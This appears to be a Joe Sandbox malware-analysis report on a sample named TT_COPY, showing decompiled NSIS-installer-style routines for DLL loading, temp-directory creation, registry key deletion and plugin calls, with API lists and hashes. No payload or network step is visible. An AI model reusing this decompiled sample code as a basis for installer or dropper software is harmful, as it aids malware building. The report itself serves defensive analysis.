                                                                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,00424A84,75DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                              • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                                                                                                                              • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                                                                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nshF836.tmp$C:\Users\user\AppData\Local\Temp\nshF836.tmp\System.dll$Call
                                                                                                                            • API String ID: 1941528284-1790802849
                                                                                                                            • Opcode ID: 3dea8835135b3834e701fe10f85874e2ee0770673dec5a47873efbfea76d0da0
                                                                                                                            • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                                                                            • Opcode Fuzzy Hash: 3dea8835135b3834e701fe10f85874e2ee0770673dec5a47873efbfea76d0da0
                                                                                                                            • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 863 40689a-4068ba GetSystemDirectoryW 864 4068bc 863->864 865 4068be-4068c0 863->865 864->865 866 4068d1-4068d3 865->866 867 4068c2-4068cb 865->867 869 4068d4-406907 wsprintfW LoadLibraryExW 866->869 867->866 868 4068cd-4068cf 867->868 868->869
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040689A(intOrPtr _a4) {
                                                                                                                            				short _v576;
                                                                                                                            				signed int _t13;
                                                                                                                            				struct HINSTANCE__* _t17;
                                                                                                                            				signed int _t19;
                                                                                                                            				void* _t24;
                                                                                                                            
                                                                                                                            				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                                                                            				if(_t13 > 0x104) {
                                                                                                                            					_t13 = 0;
                                                                                                                            				}
                                                                                                                            				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                                                                            					_t19 = 1;
                                                                                                                            				} else {
                                                                                                                            					_t19 = 0;
                                                                                                                            				}
                                                                                                                            				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                                                                            				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                                                                            				return _t17;
                                                                                                                            			}








                                                                                                                            0x004068b1
                                                                                                                            0x004068ba
                                                                                                                            0x004068bc
                                                                                                                            0x004068bc
                                                                                                                            0x004068c0
                                                                                                                            0x004068d3
                                                                                                                            0x004068cd
                                                                                                                            0x004068cd
                                                                                                                            0x004068cd
                                                                                                                            0x004068ec
                                                                                                                            0x00406900
                                                                                                                            0x00406907

                                                                                                                            APIs
                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                            • wsprintfW.USER32 ref: 004068EC
                                                                                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                                            • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                            • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                                                                            • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                            • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 870 405a6e-405ab9 CreateDirectoryW 871 405abb-405abd 870->871 872 405abf-405acc GetLastError 870->872 873 405ae6-405ae8 871->873 872->873 874 405ace-405ae2 SetFileSecurityW 872->874 874->871 875 405ae4 GetLastError 874->875 875->873
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00405A6E(WCHAR* _a4) {
                                                                                                                            				struct _SECURITY_ATTRIBUTES _v16;
                                                                                                                            				struct _SECURITY_DESCRIPTOR _v36;
                                                                                                                            				int _t22;
                                                                                                                            				long _t23;
                                                                                                                            
                                                                                                                            				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                                                            				_v36.Owner = 0x4083f8;
                                                                                                                            				_v36.Group = 0x4083f8;
                                                                                                                            				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                                                            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                                                            				_v16.lpSecurityDescriptor =  &_v36;
                                                                                                                            				_v36.Revision = 1;
                                                                                                                            				_v36.Control = 4;
                                                                                                                            				_v36.Dacl = 0x4083e8;
                                                                                                                            				_v16.nLength = 0xc;
                                                                                                                            				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                                                                            				if(_t22 != 0) {
                                                                                                                            					L1:
                                                                                                                            					return 0;
                                                                                                                            				}
                                                                                                                            				_t23 = GetLastError();
                                                                                                                            				if(_t23 == 0xb7) {
                                                                                                                            					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                                                                            						goto L1;
                                                                                                                            					}
                                                                                                                            					return GetLastError();
                                                                                                                            				}
                                                                                                                            				return _t23;
                                                                                                                            			}







                                                                                                                            0x00405a79
                                                                                                                            0x00405a7d
                                                                                                                            0x00405a80
                                                                                                                            0x00405a86
                                                                                                                            0x00405a8a
                                                                                                                            0x00405a8e
                                                                                                                            0x00405a96
                                                                                                                            0x00405a9d
                                                                                                                            0x00405aa3
                                                                                                                            0x00405aaa
                                                                                                                            0x00405ab1
                                                                                                                            0x00405ab9
                                                                                                                            0x00405abb
                                                                                                                            0x00000000
                                                                                                                            0x00405abb
                                                                                                                            0x00405ac5
                                                                                                                            0x00405acc
                                                                                                                            0x00405ae2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405ae4
                                                                                                                            0x00405ae8

                                                                                                                            APIs
                                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                            • GetLastError.KERNEL32 ref: 00405AC5
                                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                                                            • GetLastError.KERNEL32 ref: 00405AE4
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                            • API String ID: 3449924974-3355392842
                                                                                                                            • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                            • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                                                                            • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                            • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 876 402ea9-402ed2 call 4063aa 878 402ed7-402edb 876->878 879 402ee1-402ee5 878->879 880 402f8c-402f90 878->880 881 402ee7-402f08 RegEnumValueW 879->881 882 402f0a-402f1d 879->882 881->882 883 402f71-402f7f RegCloseKey 881->883 884 402f46-402f4d RegEnumKeyW 882->884 883->880 885 402f1f-402f21 884->885 886 402f4f-402f61 RegCloseKey call 40690a 884->886 885->883 888 402f23-402f37 call 402ea9 885->888 892 402f81-402f87 886->892 893 402f63-402f6f RegDeleteKeyW 886->893 888->886 894 402f39-402f45 888->894 892->880 893->880 894->884
                                                                                                                            C-Code - Quality: 48%
                                                                                                                            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                                                                            				void* _v8;
                                                                                                                            				int _v12;
                                                                                                                            				short _v536;
                                                                                                                            				void* _t27;
                                                                                                                            				signed int _t33;
                                                                                                                            				intOrPtr* _t35;
                                                                                                                            				signed int _t45;
                                                                                                                            				signed int _t46;
                                                                                                                            				signed int _t47;
                                                                                                                            
                                                                                                                            				_t46 = _a12;
                                                                                                                            				_t47 = _t46 & 0x00000300;
                                                                                                                            				_t45 = _t46 & 0x00000001;
                                                                                                                            				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
                                                                                                                            				if(_t27 == 0) {
                                                                                                                            					if((_a12 & 0x00000002) == 0) {
                                                                                                                            						L3:
                                                                                                                            						_push(0x105);
                                                                                                                            						_push( &_v536);
                                                                                                                            						_push(0);
                                                                                                                            						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                                                                            							__eflags = _t45;
                                                                                                                            							if(__eflags != 0) {
                                                                                                                            								L10:
                                                                                                                            								RegCloseKey(_v8);
                                                                                                                            								return 0x3eb;
                                                                                                                            							}
                                                                                                                            							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                                                                                            							__eflags = _t33;
                                                                                                                            							if(_t33 != 0) {
                                                                                                                            								break;
                                                                                                                            							}
                                                                                                                            							_push(0x105);
                                                                                                                            							_push( &_v536);
                                                                                                                            							_push(_t45);
                                                                                                                            						}
                                                                                                                            						RegCloseKey(_v8);
                                                                                                                            						_t35 = E0040690A(3);
                                                                                                                            						if(_t35 != 0) {
                                                                                                                            							return  *_t35(_a4, _a8, _t47, 0);
                                                                                                                            						}
                                                                                                                            						return RegDeleteKeyW(_a4, _a8);
                                                                                                                            					}
                                                                                                                            					_v12 = 0;
                                                                                                                            					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                                                            						goto L10;
                                                                                                                            					}
                                                                                                                            					goto L3;
                                                                                                                            				}
                                                                                                                            				return _t27;
                                                                                                                            			}












                                                                                                                            0x00402eb4
                                                                                                                            0x00402ebd
                                                                                                                            0x00402ec6
                                                                                                                            0x00402ed2
                                                                                                                            0x00402edb
                                                                                                                            0x00402ee5
                                                                                                                            0x00402f0a
                                                                                                                            0x00402f10
                                                                                                                            0x00402f15
                                                                                                                            0x00402f16
                                                                                                                            0x00402f46
                                                                                                                            0x00402f1f
                                                                                                                            0x00402f21
                                                                                                                            0x00402f71
                                                                                                                            0x00402f74
                                                                                                                            0x00000000
                                                                                                                            0x00402f7a
                                                                                                                            0x00402f30
                                                                                                                            0x00402f35
                                                                                                                            0x00402f37
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00402f3f
                                                                                                                            0x00402f44
                                                                                                                            0x00402f45
                                                                                                                            0x00402f45
                                                                                                                            0x00402f52
                                                                                                                            0x00402f5a
                                                                                                                            0x00402f61
                                                                                                                            0x00000000
                                                                                                                            0x00402f8a
                                                                                                                            0x00000000
                                                                                                                            0x00402f69
                                                                                                                            0x00402ef5
                                                                                                                            0x00402f08
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00402f08
                                                                                                                            0x00402f90

                                                                                                                            APIs
                                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1354259210-0
                                                                                                                            • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                                                                            • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                                                            • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                                                                            • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 895 70b51817-70b51856 call 70b51bff 899 70b51976-70b51978 895->899 900 70b5185c-70b51860 895->900 901 70b51862-70b51868 call 70b5243e 900->901 902 70b51869-70b51876 call 70b52480 900->902 901->902 907 70b518a6-70b518ad 902->907 908 70b51878-70b5187d 902->908 909 70b518cd-70b518d1 907->909 910 70b518af-70b518cb call 70b52655 call 70b51654 call 70b51312 GlobalFree 907->910 911 70b5187f-70b51880 908->911 912 70b51898-70b5189b 908->912 916 70b518d3-70b5191c call 70b51666 call 70b52655 909->916 917 70b5191e-70b51924 call 70b52655 909->917 933 70b51925-70b51929 910->933 914 70b51882-70b51883 911->914 915 70b51888-70b51889 call 70b52b98 911->915 912->907 918 70b5189d-70b5189e call 70b52e23 912->918 921 70b51885-70b51886 914->921 922 70b51890-70b51896 call 70b52810 914->922 929 70b5188e 915->929 916->933 917->933 926 70b518a3 918->926 921->907 921->915 932 70b518a5 922->932 926->932 929->926 932->907 937 70b51966-70b5196d 933->937 938 70b5192b-70b51939 call 70b52618 933->938 937->899 943 70b5196f-70b51970 GlobalFree 937->943 945 70b51951-70b51958 938->945 946 70b5193b-70b5193e 938->946 943->899 945->937 948 70b5195a-70b51965 call 70b515dd 945->948 946->945 947 70b51940-70b51948 946->947 947->945 949 70b5194a-70b5194b FreeLibrary 947->949 948->937 949->945
                                                                                                                            C-Code - Quality: 88%
                                                                                                                            			E70B51817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                            				void _v36;
                                                                                                                            				char _v136;
                                                                                                                            				struct HINSTANCE__* _t37;
                                                                                                                            				intOrPtr _t42;
                                                                                                                            				void* _t48;
                                                                                                                            				void* _t49;
                                                                                                                            				void* _t50;
                                                                                                                            				void* _t54;
                                                                                                                            				intOrPtr _t57;
                                                                                                                            				signed int _t61;
                                                                                                                            				signed int _t63;
                                                                                                                            				void* _t67;
                                                                                                                            				void* _t68;
                                                                                                                            				void* _t72;
                                                                                                                            				void* _t76;
                                                                                                                            
                                                                                                                            				_t76 = __esi;
                                                                                                                            				_t68 = __edi;
                                                                                                                            				_t67 = __edx;
                                                                                                                            				 *0x70b5506c = _a8;
                                                                                                                            				 *0x70b55070 = _a16;
                                                                                                                            				 *0x70b55074 = _a12;
                                                                                                                            				 *((intOrPtr*)(_a20 + 0xc))( *0x70b55048, E70B51651);
                                                                                                                            				_push(1); // executed
                                                                                                                            				_t37 = E70B51BFF(); // executed
                                                                                                                            				_t54 = _t37;
                                                                                                                            				if(_t54 == 0) {
                                                                                                                            					L28:
                                                                                                                            					return _t37;
                                                                                                                            				} else {
                                                                                                                            					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                                                            						E70B5243E(_t54);
                                                                                                                            					}
                                                                                                                            					_push(_t54);
                                                                                                                            					E70B52480(_t67);
                                                                                                                            					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                            					if(_t57 == 0xffffffff) {
                                                                                                                            						L14:
                                                                                                                            						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                                                                                            							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                                                                            								_push(_t54);
                                                                                                                            								_t37 = E70B52655();
                                                                                                                            							} else {
                                                                                                                            								_push(_t76);
                                                                                                                            								_push(_t68);
                                                                                                                            								_t61 = 8;
                                                                                                                            								_t13 = _t54 + 0x1018; // 0x1018
                                                                                                                            								memcpy( &_v36, _t13, _t61 << 2);
                                                                                                                            								_t42 = E70B51666(_t54,  &_v136);
                                                                                                                            								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                                                                                            								_t18 = _t54 + 0x1018; // 0x1018
                                                                                                                            								_t72 = _t18;
                                                                                                                            								_push(_t54);
                                                                                                                            								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                                                                                            								 *_t72 = 4;
                                                                                                                            								E70B52655();
                                                                                                                            								_t63 = 8;
                                                                                                                            								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                                                                            							}
                                                                                                                            						} else {
                                                                                                                            							_push(_t54);
                                                                                                                            							E70B52655();
                                                                                                                            							_t37 = GlobalFree(E70B51312(E70B51654(_t54)));
                                                                                                                            						}
                                                                                                                            						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                                                            							_t37 = E70B52618(_t54);
                                                                                                                            							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                                                                            								_t37 =  *(_t54 + 0x1008);
                                                                                                                            								if(_t37 != 0) {
                                                                                                                            									_t37 = FreeLibrary(_t37);
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                                                                                            								_t37 = E70B515DD( *0x70b55068);
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                                                                                            							goto L28;
                                                                                                                            						} else {
                                                                                                                            							return GlobalFree(_t54);
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					_t48 =  *_t54;
                                                                                                                            					if(_t48 == 0) {
                                                                                                                            						if(_t57 != 1) {
                                                                                                                            							goto L14;
                                                                                                                            						}
                                                                                                                            						E70B52E23(_t54);
                                                                                                                            						L12:
                                                                                                                            						_t54 = _t48;
                                                                                                                            						L13:
                                                                                                                            						goto L14;
                                                                                                                            					}
                                                                                                                            					_t49 = _t48 - 1;
                                                                                                                            					if(_t49 == 0) {
                                                                                                                            						L8:
                                                                                                                            						_t48 = E70B52B98(_t57, _t54); // executed
                                                                                                                            						goto L12;
                                                                                                                            					}
                                                                                                                            					_t50 = _t49 - 1;
                                                                                                                            					if(_t50 == 0) {
                                                                                                                            						E70B52810(_t54);
                                                                                                                            						goto L13;
                                                                                                                            					}
                                                                                                                            					if(_t50 != 1) {
                                                                                                                            						goto L14;
                                                                                                                            					}
                                                                                                                            					goto L8;
                                                                                                                            				}
                                                                                                                            			}


















                                                                                                                            0x70b51817
                                                                                                                            0x70b51817
                                                                                                                            0x70b51817
                                                                                                                            0x70b51824
                                                                                                                            0x70b5182c
                                                                                                                            0x70b51839
                                                                                                                            0x70b51847
                                                                                                                            0x70b5184a
                                                                                                                            0x70b5184c
                                                                                                                            0x70b51851
                                                                                                                            0x70b51856
                                                                                                                            0x70b51978
                                                                                                                            0x70b51978
                                                                                                                            0x70b5185c
                                                                                                                            0x70b51860
                                                                                                                            0x70b51863
                                                                                                                            0x70b51868
                                                                                                                            0x70b51869
                                                                                                                            0x70b5186a
                                                                                                                            0x70b51870
                                                                                                                            0x70b51876
                                                                                                                            0x70b518a6
                                                                                                                            0x70b518ad
                                                                                                                            0x70b518d1
                                                                                                                            0x70b5191e
                                                                                                                            0x70b5191f
                                                                                                                            0x70b518d3
                                                                                                                            0x70b518d3
                                                                                                                            0x70b518d4
                                                                                                                            0x70b518dd
                                                                                                                            0x70b518de
                                                                                                                            0x70b518e8
                                                                                                                            0x70b518eb
                                                                                                                            0x70b518f0
                                                                                                                            0x70b518f7
                                                                                                                            0x70b518f7
                                                                                                                            0x70b518fd
                                                                                                                            0x70b518fe
                                                                                                                            0x70b51904
                                                                                                                            0x70b5190a
                                                                                                                            0x70b51917
                                                                                                                            0x70b51918
                                                                                                                            0x70b5191b
                                                                                                                            0x70b518af
                                                                                                                            0x70b518af
                                                                                                                            0x70b518b0
                                                                                                                            0x70b518c5
                                                                                                                            0x70b518c5
                                                                                                                            0x70b51929
                                                                                                                            0x70b5192c
                                                                                                                            0x70b51939
                                                                                                                            0x70b51940
                                                                                                                            0x70b51948
                                                                                                                            0x70b5194b
                                                                                                                            0x70b5194b
                                                                                                                            0x70b51948
                                                                                                                            0x70b51958
                                                                                                                            0x70b51960
                                                                                                                            0x70b51965
                                                                                                                            0x70b51958
                                                                                                                            0x70b5196d
                                                                                                                            0x00000000
                                                                                                                            0x70b5196f
                                                                                                                            0x00000000
                                                                                                                            0x70b51970
                                                                                                                            0x70b5196d
                                                                                                                            0x70b5187a
                                                                                                                            0x70b5187d
                                                                                                                            0x70b5189b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b5189e
                                                                                                                            0x70b518a3
                                                                                                                            0x70b518a3
                                                                                                                            0x70b518a5
                                                                                                                            0x00000000
                                                                                                                            0x70b518a5
                                                                                                                            0x70b5187f
                                                                                                                            0x70b51880
                                                                                                                            0x70b51888
                                                                                                                            0x70b51889
                                                                                                                            0x00000000
                                                                                                                            0x70b51889
                                                                                                                            0x70b51882
                                                                                                                            0x70b51883
                                                                                                                            0x70b51891
                                                                                                                            0x00000000
                                                                                                                            0x70b51891
                                                                                                                            0x70b51886
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51886

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 70B51BFF: GlobalFree.KERNEL32(?), ref: 70B51E74
                                                                                                                              • Part of subcall function 70B51BFF: GlobalFree.KERNEL32(?), ref: 70B51E79
                                                                                                                              • Part of subcall function 70B51BFF: GlobalFree.KERNEL32(?), ref: 70B51E7E
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70B518C5
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 70B5194B
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70B51970
                                                                                                                              • Part of subcall function 70B5243E: GlobalAlloc.KERNEL32(00000040,?), ref: 70B5246F
                                                                                                                              • Part of subcall function 70B52810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70B51896,00000000), ref: 70B528E0
                                                                                                                              • Part of subcall function 70B51666: wsprintfW.USER32 ref: 70B51694
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1093774692.0000000070B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 70B50000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1093699351.0000000070B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093840225.0000000070B54000.00000002.00000001.01000000.00000004.sdmpDownload File
